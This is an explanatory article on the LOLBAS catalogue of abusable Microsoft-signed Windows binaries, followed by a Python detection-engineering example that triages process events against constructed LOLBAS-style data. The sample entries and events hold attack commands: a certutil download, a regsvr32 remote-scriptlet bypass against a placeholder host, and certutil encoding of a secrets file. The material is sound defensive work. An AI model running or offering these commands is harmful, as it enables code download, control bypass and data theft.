LOLBAS (Living Off The Land Binaries, Scripts and Libraries) is a curated knowledge base of Microsoft-signed binaries, scripts and libraries, shipped with Windows or supplied by Microsoft, that an attacker can abuse to execute code, fetch tooling or evade controls without dropping a custom binary. It serves as a technical registry that maps trusted system files to the functions they expose and to the offensive techniques those functions enable.
What distinguishes the project is its capability-driven index: each entry is tagged with the functions the binary provides (for example Execute, Download, Upload, Encode, Decode, ADS, AWL Bypass, UAC Bypass, Credentials), and each documented command is annotated with the MITRE ATT&CK technique it implements. This association layer lets an analyst move from a binary to the techniques it enables and from a technique back to the binaries that realize it, which is the lookup both security research and detection engineering need.
The catalogued capabilities span code execution through signed proxies (application-control bypass), credential access and data exfiltration, defense evasion such as hiding payloads in NTFS alternate data streams, and file handling and network transfer (copy, download, upload). Entries also reference detection content (Sigma, Elastic and Splunk rules, and indicators of compromise) that keys on abnormal invocations of the trusted binary. Because the same binaries run constantly during legitimate administration, a name match alone is not a verdict; useful detections combine the binary name with argument patterns, parent process, network activity and an image path outside the documented install location.
The entry data is published as JSON and CSV exports and maintained as per-binary YAML files in the project repository, so it can be ingested directly into SIEM lookups, threat-hunting notebooks and detection pipelines.
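The following is an added example (not LOLBAS project code) of how a detection engineer might consume the JSON export described above: it builds the capability index from the entry data, then triages constructed process-creation events, reporting the LOLBAS functions and ATT&CK IDs for each matched binary, which documented command the observed switches correspond to, and whether the image ran from a documented path. The two sample entries and the four events are constructed here; their field names (Name, Full_Path[].Path, Commands[].Category, Commands[].MitreID) are the author's reading of the export schema and should be verified against the live export before use.

```python
"""Triage process-creation events against a LOLBAS-style JSON export.

Added example, not LOLBAS project code. The sample entries below are
CONSTRUCTED to mirror the field names assumed for the LOLBAS JSON export
(Name, Full_Path[].Path, Commands[].Category, Commands[].MitreID);
verify them against the real export before relying on this schema.
"""
import json
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample in the shape of the export: two well-known LOLBins.
SAMPLE_LOLBAS_JSON = json.dumps([
    {
        "Name": "Certutil.exe",
        "Full_Path": [
            {"Path": "C:\\Windows\\System32\\certutil.exe"},
            {"Path": "C:\\Windows\\SysWOW64\\certutil.exe"},
        ],
        "Commands": [
            {"Command": "certutil.exe -urlcache -split -f http://example.invalid/tool.exe tool.exe",
             "Category": "Download", "MitreID": "T1105"},
            {"Command": "certutil -encode payload.dll payload.txt",
             "Category": "Encode", "MitreID": "T1027"},
        ],
    },
    {
        "Name": "Regsvr32.exe",
        "Full_Path": [
            {"Path": "C:\\Windows\\System32\\regsvr32.exe"},
            {"Path": "C:\\Windows\\SysWOW64\\regsvr32.exe"},
        ],
        "Commands": [
            {"Command": "regsvr32 /s /n /u /i:http://example.invalid/file.sct scrobj.dll",
             "Category": "AWL Bypass", "MitreID": "T1218.010"},
            {"Command": "regsvr32 /s /u /i:file.sct scrobj.dll",
             "Category": "AWL Bypass", "MitreID": "T1218.010"},
        ],
    },
])

# Constructed process-creation events (image path + command line), e.g. from
# Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.
SAMPLE_EVENTS = [
    {"image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.exe a.exe"},
    {"image": "C:\\Users\\Public\\certutil.exe",          # copied out of System32
     "cmdline": "certutil -encode secrets.db out.txt"},
    {"image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://example.invalid/file.sct scrobj.dll"},
    {"image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"},
]


def load_lolbas(raw_json: str) -> dict:
    """Return {lowercase binary name: entry} for every entry in the export."""
    return {e["Name"].lower(): e for e in json.loads(raw_json)}


def capability_index(index: dict) -> dict:
    """Invert the data into {Category: sorted binary names} (function -> binaries)."""
    by_cat = defaultdict(set)
    for entry in index.values():
        for cmd in entry.get("Commands", []):
            by_cat[cmd["Category"]].add(entry["Name"])
    return {cat: sorted(names) for cat, names in by_cat.items()}


def _switches(cmdline: str) -> set:
    """Switch-like tokens ('-x', '/x', '/i:...'); any value after ':' is dropped."""
    out = set()
    for tok in cmdline.split():
        if tok.startswith(("-", "/")):
            head = tok.split(":", 1)[0].lower()
            out.add(head + ":" if ":" in tok else head)
    return out


def triage(index: dict, events: list) -> list:
    """Return one finding per event whose image basename is a catalogued LOLBin."""
    findings = []
    for ev in events:
        entry = index.get(PureWindowsPath(ev["image"]).name.lower())
        if entry is None:
            continue
        observed = _switches(ev["cmdline"])
        # A documented command "matches" when all of its switches were observed.
        matched = {c["Category"] for c in entry["Commands"]
                   if _switches(c["Command"]) and _switches(c["Command"]) <= observed}
        known = {p["Path"].lower() for p in entry.get("Full_Path", [])}
        findings.append({
            "image": ev["image"],
            "lolbin": entry["Name"],
            "categories": sorted({c["Category"] for c in entry["Commands"]}),
            "mitre": sorted({c["MitreID"] for c in entry["Commands"]}),
            "matched_categories": sorted(matched),
            "expected_path": ev["image"].lower() in known,  # False -> copied/renamed LOLBin
        })
    return findings


if __name__ == "__main__":
    idx = load_lolbas(SAMPLE_LOLBAS_JSON)
    print(json.dumps(capability_index(idx), indent=2))
    print(json.dumps(triage(idx, SAMPLE_EVENTS), indent=2))
```

The switch-subset heuristic is deliberately simple: it ties a hit to a specific documented command rather than the binary name alone, and the expected_path flag surfaces the case where a LOLBin has been copied to a user-writable directory, which is itself worth alerting on even when the command line looks benign.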